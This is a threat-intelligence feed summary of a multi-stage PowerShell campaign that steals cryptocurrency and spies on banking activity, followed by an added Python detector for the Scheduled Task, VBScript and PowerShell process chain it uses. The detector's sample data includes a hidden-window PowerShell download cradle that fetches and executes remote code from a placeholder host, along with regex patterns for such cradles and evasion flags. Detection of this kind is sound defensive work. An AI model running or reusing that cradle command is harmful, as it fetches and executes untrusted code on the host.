Operation DualScript – A Multi-Stage PowerShell Malware Campaign Targeting Cryptocurrency and Financial Activity
ID: 62f902f8-8e9b-5121-87e9-04967e661d16
STIX ID: report--62f902f8-8e9b-5121-87e9-04967e661d16
Feed Name: Seqrite Blog
Operation DualScript is a financially motivated, multi-stage malware campaign that abuses Scheduled Tasks, VBScript, and PowerShell to deploy two parallel chains: a web-based PowerShell loader that fetches a Wallet.txt clipboard-hijacker to redirect cryptocurrency payments, and a second PowerShell chain that runs RetroRAT in memory to perform keylogging, screen capture, targeted monitoring of U.S. banking and crypto services, and exfiltration to TCP-based C2 servers. The report includes analysis of persistence, evasion, C2 handshake behavior, targeted keywords, IOCs (file hashes and malicious domains/URLs), and MITRE technique mappings.
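The summary describes a process chain a defender can hunt for directly: a Scheduled Task host spawning a VBScript interpreter, which in turn launches PowerShell with a download cradle that executes fetched content in memory. The following is an added example, not code from the Seqrite report or from the campaign itself; the process-creation events are constructed to mirror the chain described above (the `example.invalid` URL, file names, PIDs and the rule names are all assumptions for illustration), and the patterns are generic PowerShell-cradle heuristics rather than IOCs from the report. It flags each stage separately and then confirms the full svchost(Schedule) -> wscript -> powershell ancestry so that a lone hidden-window PowerShell launch is scored differently from the complete chain.

```python
"""Hunt for a Scheduled Task -> VBScript -> PowerShell download-cradle chain in
process-creation telemetry (Sysmon Event ID 1 / EDR equivalents).

Added example; events below are constructed, not taken from the report."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry. PIDs 700/1200/1300 form the malicious chain;
# 1400 and 1500 are benign noise to confirm the rules do not over-fire.
SAMPLE_EVENTS = [
    ProcessEvent(700, 600, r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs -p -s Schedule"),
    ProcessEvent(1200, 700, r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe //B C:\Users\Public\update.vbs"),
    ProcessEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -ep bypass -c "
                 "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Wallet.txt')\""),
    ProcessEvent(1400, 600, r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs -p -s Schedule"),          # benign task host
    ProcessEvent(1500, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),    # benign admin script
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download cradle: the loader pulls the next stage from a web server.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod|\birm\b",
    re.I)
# In-memory execution of whatever was fetched (fileless second stage).
IN_MEMORY_EXEC = re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I)
# Classic evasion switches: hidden window, execution-policy bypass, no profile.
EVASION_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop\b|-noni\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_task_scheduler_host(event: ProcessEvent) -> bool:
    """The Task Scheduler service runs as svchost.exe with '-s Schedule'."""
    return basename(event.image) == "svchost.exe" and "-s schedule" in event.cmdline.lower()


def detect_chain(events):
    """Return (pid, rule_name) pairs for each suspicious stage seen independently."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name in SCRIPT_HOSTS and parent and is_task_scheduler_host(parent):
            alerts.append((e.pid, "scheduled_task_spawns_script_host"))
        if name in POWERSHELL:
            if pname in SCRIPT_HOSTS:
                alerts.append((e.pid, "script_host_spawns_powershell"))
            if DOWNLOAD_CRADLE.search(e.cmdline) and IN_MEMORY_EXEC.search(e.cmdline):
                alerts.append((e.pid, "in_memory_download_cradle"))
            if EVASION_FLAGS.search(e.cmdline):
                alerts.append((e.pid, "powershell_evasion_flags"))
    return alerts


def find_full_chains(events):
    """PIDs of PowerShell processes whose ancestry is svchost(Schedule) -> script host -> powershell."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        grandparent = by_pid.get(parent.ppid) if parent else None
        if (parent and basename(parent.image) in SCRIPT_HOSTS
                and grandparent and is_task_scheduler_host(grandparent)):
            hits.append(e.pid)
    return hits


if __name__ == "__main__":
    for pid, rule in detect_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print("full chain confirmed for PIDs:", find_full_chains(SAMPLE_EVENTS))
```

The stage rules are deliberately loose (hidden-window PowerShell is common in legitimate automation), so the ancestry check in `find_full_chains` is what should drive a high-severity alert; the individual stage hits are better used for enrichment or hunting. On real telemetry the same ancestry walk can be done with Sysmon's ParentProcessGuid instead of PIDs, which avoids PID reuse problems.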
